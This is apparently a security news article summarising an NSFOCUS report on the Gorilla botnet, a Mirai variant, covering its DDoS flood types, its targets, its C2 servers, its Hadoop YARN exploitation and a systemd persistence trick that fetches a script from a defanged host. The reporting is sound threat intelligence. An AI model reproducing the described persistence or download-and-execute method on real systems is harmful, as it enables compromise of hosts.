Cybersecurity researchers have found a new botnet malware family known as Gorilla (also called GorillaBot), which is a variant of the leaked Mirai botnet source code.
A report from cybersecurity firm NSFOCUS revealed that Gorilla “sent out over 300,000 attack commands, demonstrating a significant attack density” between September 4 and September 27, 2024. The botnet has been initiating around 20,000 commands for distributed denial-of-service (DDoS) attacks daily on average.
The targets of the botnet span over 100 countries, affecting various sectors including universities, government websites, telecoms, banks, gaming, and gambling industries. Notably, China, the U.S., Canada, and Germany were the most impacted by these attacks.
Using techniques like UDP flood, ACK BYPASS flood, Valve Source Engine (VSE) flood, SYN flood, and ACK flood, Gorilla conducts DDoS attacks. The botnet exploits the connectionless nature of the UDP protocol for IP spoofing to generate high traffic volumes.
In addition to supporting different CPU architectures such as ARM, MIPS, x86_64, and x86, Gorilla can connect to one of the five predefined command-and-control (C2) servers to receive DDoS commands.
Interestingly, the malware includes capabilities to exploit a vulnerability in Apache Hadoop YARN RPC for remote code execution. This vulnerability has been exploited in the past, as reported by Alibaba Cloud and Trend Micro.
To ensure persistence on the host, Gorilla creates a service file named custom.service in the “/etc/systemd/system/” directory, which runs automatically at system startup. This service downloads and executes a shell script (“lol.sh”) from a remote server (“pen.gorillafirewall[.]su”). Commands are also added to other system files for executing the shell script.
NSFOCUS mentioned that Gorilla exhibits sophistication by using encryption methods like the Keksec group to conceal critical information, along with multiple techniques to maintain control over IoT devices and cloud hosts, making it a notable emerging botnet family.
